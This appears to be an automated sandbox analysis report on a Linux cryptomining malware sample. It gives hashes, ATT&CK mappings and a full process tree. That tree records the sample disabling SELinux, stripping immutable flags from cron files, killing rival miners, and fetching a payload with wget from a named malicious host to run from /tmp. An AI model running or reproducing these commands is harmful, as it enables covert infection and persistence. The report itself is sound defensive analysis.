ba2e2bda0794551b0d203c2b617a8b327baa68199e5d7dd22d8849a77fac1183

General

Target

1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
Size

11KB
MD5

1196d0a31402b04a32aa582ae6d2c15b
SHA1

5d6a8c0437bdf30079188283b0e60d063e649f27
SHA256

ba2e2bda0794551b0d203c2b617a8b327baa68199e5d7dd22d8849a77fac1183
SHA512

cb9e5c0b2a430bd2963b64e659cb2cb65f20d53888e6a188f9831a65c0dd568550439423ff2349c7100e09f45ba3b07e97688c1d9190b2bc1d7a595f310cb28a
SSDEEP

192:fQ6PgM8PvaA0Rj1veSS7MYtGRwcY3Pkfz216zPEDAzQSvmgVgIbc1H7vjjB4C1v6:fQ6PgM8PvaA0Rj1vy7fmjwMxzgX17j/s

Score

7^/10

antivm persistence

Malware Config

Signatures

Executes dropped EXE 2 IoCs

Processes:

dbuseddbused

ioc pid process

/tmp/dbused 913 dbused
/tmp/dbused 915 dbused
Attempts to change immutable files 4 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.

Processes:

grepchattrchattrgrep

pid process

794 grep
807 chattr
790 chattr
792 grep
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
antivm

Virtualization/Sandbox Evasion
T1497

Processes:

grep

description ioc process

File opened for reading /proc/cpuinfo grep

ioc	pid	process
/tmp/dbused	913	dbused
/tmp/dbused	915	dbused

pid	process
794	grep
807	chattr
790	chattr
792	grep

description	ioc	process
File opened for reading	/proc/cpuinfo	grep

Creates/modifies Cron job 1 TTPs 6 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task/Job

T1053

Processes:

1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118

description	ioc
File opened for modification	/etc/cron.hourly/oanacroner1
File opened for modification	/etc/cron.d/root	1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
File opened for modification	/etc/cron.d/apache	1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
File opened for modification	/etc/cron.d/nginx	1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
File opened for modification	/var/spool/cron/root	1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
File opened for modification	/var/spool/cron/crontabs/root	1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118

Disables SELinux 7 IoCs
Disables SELinux security module.

Processes:

grepgrepgrepgrepsetenforcegrepgrep

pid process

753 grep
765 grep
771 grep
920 grep
667 setenforce
726 grep
733 grep
Enumerates running processes
Discovers information about currently running processes on the system

pid	process
753	grep
765	grep
771	grep
920	grep
667	setenforce
726	grep
733	grep

Reads CPU attributes 1 TTPs 17 IoCs

System Information Discovery

T1082

Processes:

killkillkillsysctlkillkillpskillkillkillkillkillkillkillkillkillps

description	ioc	process
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	sysctl
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

Processes:

pspsxargsawkkillkillawksedmkdirawkkill

description	ioc	process
File opened for reading	/proc/18/stat	ps
File opened for reading	/proc/792/cmdline	ps
File opened for reading	/proc/6/cmdline	ps
File opened for reading	/proc/684/stat	ps
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/9/cmdline	ps
File opened for reading	/proc/29/status	ps
File opened for reading	/proc/661/cmdline	ps
File opened for reading	/proc/111/stat	ps
File opened for reading	/proc/794/cmdline	ps
File opened for reading	/proc/filesystems	kill
File opened for reading	/proc/26/stat	ps
File opened for reading	/proc/26/stat	ps
File opened for reading	/proc/filesystems	kill
File opened for reading	/proc/3/stat	ps
File opened for reading	/proc/41/status	ps
File opened for reading	/proc/305/stat	ps
File opened for reading	/proc/458/status	ps
File opened for reading	/proc/794/stat	ps
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/sys/kernel/osrelease	kill
File opened for reading	/proc/274/status	ps
File opened for reading	/proc/uptime	ps
File opened for reading	/proc/19/status	ps
File opened for reading	/proc/666/cmdline	ps
File opened for reading	/proc/43/cmdline	ps
File opened for reading	/proc/406/cmdline	ps
File opened for reading	/proc/406/status	ps
File opened for reading	/proc/273/status	ps
File opened for reading	/proc/278/status	ps
File opened for reading	/proc/9/cmdline	ps
File opened for reading	/proc/343/stat	ps
File opened for reading	/proc/420/status	ps
File opened for reading	/proc/684/cmdline	ps
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/11/cmdline	ps
File opened for reading	/proc/152/cmdline	ps
File opened for reading	/proc/filesystems	mkdir
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/144/cmdline	ps
File opened for reading	/proc/309/stat	ps
File opened for reading	/proc/657/stat	ps
File opened for reading	/proc/674/cmdline	ps
File opened for reading	/proc/2/cmdline	ps
File opened for reading	/proc/109/stat	ps
File opened for reading	/proc/657/stat	ps
File opened for reading	/proc/674/cmdline	ps
File opened for reading	/proc/sys/kernel/osrelease	kill
File opened for reading	/proc/457/cmdline	ps
File opened for reading	/proc/664/cmdline	ps
File opened for reading	/proc/5/cmdline	ps
File opened for reading	/proc/8/status	ps
File opened for reading	/proc/9/status	ps
File opened for reading	/proc/16/stat	ps
File opened for reading	/proc/14/cmdline	ps
File opened for reading	/proc/29/stat	ps
File opened for reading	/proc/7/cmdline	ps
File opened for reading	/proc/14/cmdline	ps
File opened for reading	/proc/29/cmdline	ps
File opened for reading	/proc/13/stat	ps
File opened for reading	/proc/28/status	ps
File opened for reading	/proc/28/cmdline	ps
File opened for reading	/proc/274/status	ps

Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.

Processes:

description ioc

File opened for modification /tmp/dbused
File opened for modification /tmp/bashirc

description	ioc
File opened for modification	/tmp/dbused
File opened for modification	/tmp/bashirc

/tmp/1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
/tmp/1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
1⤵
- Creates/modifies Cron job
PID:665

/usr/sbin/setenforce
setenforce 0
2⤵
- Disables SELinux
PID:667

/bin/grep
grep -c processor /proc/cpuinfo
2⤵
- Checks CPU configuration
PID:672

/sbin/sysctl
sysctl -w "vm.nr_hugepages=3"
2⤵
- Reads CPU attributes
PID:675

/bin/grep
grep :3333
2⤵
PID:679

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:680

/usr/bin/xargs
xargs kill -9
2⤵
PID:682

/sbin/kill
kill -9
3⤵
PID:687

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:687

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:681

/bin/grep
grep :4444
2⤵
PID:691

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:692

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:694

/usr/bin/xargs
xargs kill -9
2⤵
PID:695

/sbin/kill
kill -9
3⤵
PID:699

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:699

/bin/grep
grep :5555
2⤵
PID:703

/usr/bin/awk
awk "{print \$7}"
2⤵
- Reads runtime system information
PID:704

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:705

/usr/bin/xargs
xargs kill -9
2⤵
PID:706

/sbin/kill
kill -9
3⤵
PID:708

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:708

/bin/grep
grep :7777
2⤵
PID:710

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:711

/usr/bin/xargs
xargs kill -9
2⤵
PID:713

/sbin/kill
kill -9
3⤵
PID:715

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:715

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:712

/bin/grep
grep :14444
2⤵
PID:718

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:719

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:720

/usr/bin/xargs
xargs kill -9
2⤵
PID:721

/sbin/kill
kill -9
3⤵
PID:723

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:723

/bin/grep
grep :5790
2⤵
- Disables SELinux
PID:726

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:727

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:729

/usr/bin/xargs
xargs kill -9
2⤵
PID:730

/sbin/kill
kill -9
3⤵
PID:731

/bin/kill
kill -9
3⤵
- Reads CPU attributes
- Reads runtime system information
PID:731

/bin/grep
grep :45700
2⤵
- Disables SELinux
PID:733

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:735

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:736

/usr/bin/xargs
xargs kill -9
2⤵
PID:737

/sbin/kill
kill -9
3⤵
PID:738

/bin/kill
kill -9
3⤵
- Reads CPU attributes
- Reads runtime system information
PID:738

/bin/grep
grep :2222
2⤵
PID:740

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:741

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:742

/usr/bin/xargs
xargs kill -9
2⤵
PID:743

/sbin/kill
kill -9
3⤵
PID:745

/bin/kill
kill -9
3⤵
- Reads CPU attributes
- Reads runtime system information
PID:745

/bin/grep
grep :9999
2⤵
PID:747

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:748

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:749

/usr/bin/xargs
xargs kill -9
2⤵
PID:750

/sbin/kill
kill -9
3⤵
PID:751

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:751

/bin/grep
grep :20580
2⤵
- Disables SELinux
PID:753

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:754

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:755

/usr/bin/xargs
xargs kill -9
2⤵
- Reads runtime system information
PID:756

/sbin/kill
kill -9
3⤵
PID:757

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:757

/bin/grep
grep :13531
2⤵
PID:759

/usr/bin/awk
awk "{print \$7}"
2⤵
- Reads runtime system information
PID:760

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:761

/usr/bin/xargs
xargs kill -9
2⤵
PID:762

/sbin/kill
kill -9
3⤵
PID:763

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:763

/bin/grep
grep 23.94.24.12:8080
2⤵
- Disables SELinux
PID:765

/bin/sed
sed -e "s/\\/.*//g"
2⤵
- Reads runtime system information
PID:767

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:766

/usr/bin/xargs
xargs kill -9
2⤵
PID:768

/sbin/kill
kill -9
3⤵
PID:769

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:769

/bin/grep
grep 134.122.17.13:8080
2⤵
- Disables SELinux
PID:771

/usr/bin/awk
awk "{print \$7}"
2⤵
- Reads runtime system information
PID:772

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:773

/usr/bin/xargs
xargs kill -9
2⤵
PID:774

/sbin/kill
kill -9
3⤵
PID:775

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:775

/bin/grep
grep 107.189.11.170:443
2⤵
PID:777

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:778

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:779

/usr/bin/xargs
xargs kill -9
2⤵
PID:780

/sbin/kill
kill -9
3⤵
PID:781

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:781

/usr/bin/chattr
chattr -i -a /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down
2⤵
- Attempts to change immutable files
PID:790

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:791

/bin/grep
grep -i "[a]liyun"
2⤵
- Attempts to change immutable files
PID:792

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:793

/bin/grep
grep -i "[y]unjing"
2⤵
- Attempts to change immutable files
PID:794

/bin/sleep
sleep 1
2⤵
PID:798

/usr/bin/chattr
chattr -ai /tmp/dbused
2⤵
- Attempts to change immutable files
PID:807

/bin/mkdir
mkdir -p /var/spool/cron/crontabs
2⤵
PID:893

/bin/mkdir
mkdir -p /etc/cron.hourly
2⤵
- Reads runtime system information
PID:894

/bin/chmod
chmod 755 /etc/cron.hourly/oanacroner1
2⤵
PID:896

/bin/uname
uname -m
2⤵
PID:907

/usr/bin/wget
wget -q -O - http://bash.givemexyz.in/armv7l
2⤵
PID:908

/bin/chmod
chmod +x /tmp/dbused
2⤵
PID:911

/bin/chmod
chmod +x /tmp/dbused
2⤵
PID:912

/tmp/dbused
/tmp/dbused -c
2⤵
- Executes dropped EXE
PID:913

/tmp/dbused
/tmp/dbused -pwn
2⤵
- Executes dropped EXE
PID:915

/bin/sleep
sleep 5
2⤵
PID:917

/bin/uname
uname -m
2⤵
PID:923

/usr/bin/wget
wget -q -O - http://bash.givemexyz.in/bashirc.armv7l
2⤵
PID:924

/usr/bin/seq
seq 0 255
1⤵
PID:783

/usr/bin/sort
sort -R
1⤵
PID:784

/usr/bin/head
head -n1
1⤵
PID:785

/usr/bin/seq
seq 0 255
1⤵
PID:787

/usr/bin/sort
sort -R
1⤵
PID:788

/usr/bin/head
head -n1
1⤵
PID:789

/sbin/ip
ip a
1⤵
PID:810

/bin/grep
grep "BROADCAST\\|inet"
1⤵
PID:811

/bin/grep
grep -oP "inet\\s+\\K\\d{1,3}\\.\\d{1,3}"
1⤵
PID:812

/bin/grep
grep -v 127
1⤵
PID:813

/bin/grep
grep -v inet6
1⤵
PID:814

/bin/grep
grep -v 255
1⤵
PID:815

/usr/bin/head
head -n1
1⤵
PID:816

/bin/ping
ping -c 1 pool.supportxmr.com
1⤵
PID:819

/bin/grep
grep "bytes of data"
1⤵
PID:820

/usr/bin/wc
wc -l
1⤵
PID:821

/bin/ping
ping -c 1 bash.givemexyz.in
1⤵
PID:888

/bin/grep
grep "bytes of data"
1⤵
PID:889

/usr/bin/wc
wc -l
1⤵
PID:890

/bin/grep
grep "212.114.52.24:8080\\|194.5.249.24:8080"
1⤵
PID:899

/bin/grep
grep "LISTEN\\|ESTABLISHED\\|TIME_WAIT"
1⤵
PID:900

/bin/grep
grep -v grep
1⤵
PID:901

/bin/grep
grep "212.114.52.24:8080\\|194.5.249.24:8080"
1⤵
PID:904

/bin/grep
grep ESTABLISHED
1⤵
PID:905

/bin/grep
grep -v grep
1⤵
PID:906

/bin/grep
grep 104.168.71.132:80
1⤵
- Disables SELinux
PID:920

/bin/grep
grep ESTABLISHED
1⤵
PID:921

/bin/grep
grep -v grep
1⤵
PID:922

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

1

T1053

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Virtualization/Sandbox Evasion

1

T1497

Credential Access

Discovery

Virtualization/Sandbox Evasion

1

T1497

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/cron.d/apache
Filesize
284B

MD5
9e9f6a486d0ea5976184c95a2f52cd49

SHA1
e44fe455508309e8e21f9f33fffcc7eecca0de57

SHA256
4d63cb713eb9c5f6082e7eb63dd3811d0b6f1e5d35fa3589c201496b222d2337

SHA512
1af5c94549c6f06ce522ee026da795226d3566e4868816844e9a6c7e3ffb7edb8b3457ac3cfe5c23f17e21b66e8464c9f79decc866f37e862f5e750307d273b1

Download Submit
/etc/cron.d/nginx
Filesize
284B

MD5
69f8fe8920f737d807cfda8f9d2ff2dd

SHA1
df11f2d59edac589962a0178e50b6117d18a1933

SHA256
5ad7db249a177b46bcb4b5e36ae590fe154b33fec7924bdf61481d281d3c2b8e

SHA512
034bd9e34f0deb1d7656ae2c914a304a4efca6920de9d1082a845cdb2ec13c71d46bc0a025a975125169e46c31ac87b7a73f4dc5b8e999e4b24308219f3c2137

Download Submit
/etc/cron.d/root
Filesize
284B

MD5
ddb2c00af645c486a790ed6d180b8819

SHA1
4ff1fc702a6d0bbf4cca6be1b2f3ef4d492a9340

SHA256
8f05cba82e2eb4ced38eb907928abce67112ebced31d4622428ddadc2d7a1120

SHA512
1f29d87c3d78bd42706a7eeedc7557f0d0370436a14cd2279bffa2af58036e1a6350b935b08c8635a9193d3f76e9d76ff3a9c08bfada64ef74f914b3354677a4

Download Submit
/etc/cron.hourly/oanacroner1
Filesize
264B

MD5
5cc2369275d33b8007781d1024edca44

SHA1
3e977f6e183c114affa947b2a2a70f7159ccddcc

SHA256
4a123c1f9cb0b49e960603805f087bb73ad26ff72176eba5089ced91823c92fe

SHA512
94ecd7e71c2e1edd1b466154aa24f4715d53826e4dafd0fe65123d98f96a08cdd9793dbc5403a47a4a87549eb16c503424e9d799f954c3dc2191d2ac2777ea49

Download Submit
/var/spool/cron/crontabs/root
Filesize
277B

MD5
e3d993445d42ab3ed35d78335d8ae5a3

SHA1
515765b31ed7b7098c12b7baae361fc86f6903ca

SHA256
6a1c7caaf79b92073f63e1d84ce8bde50e85bfffe03a7f26d6d1264f685194bd

SHA512
006c013726d50d6f1de60c5ff63fcfd881d219f25e66f1011630772443e4a827ff2148cda34eac6f66cb01256edf0f875815bb13836b3b942930cb1be7ca766f

Download Submit
/var/spool/cron/root
Filesize
280B

MD5
3abb4bc980da82bb669c1640539c5316

SHA1
be90d689bd325d72f544ab87eed84871a0130f3d

SHA256
6b0977f4e9b0023b95cb213ecfd85870db7617cb9db493a6126daf11ace4a71b

SHA512
ab1b09cf8751758ca9fc323d6ce21d4bf34267486b96e41d256a9983df23694a73e73c5b5e245a78055471db0f48e4cea4a9e26f8dbf73924fcc4649f59963ff

Download Submit
memory/763-1-0xb6c23000-0xb6c34044-memory.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads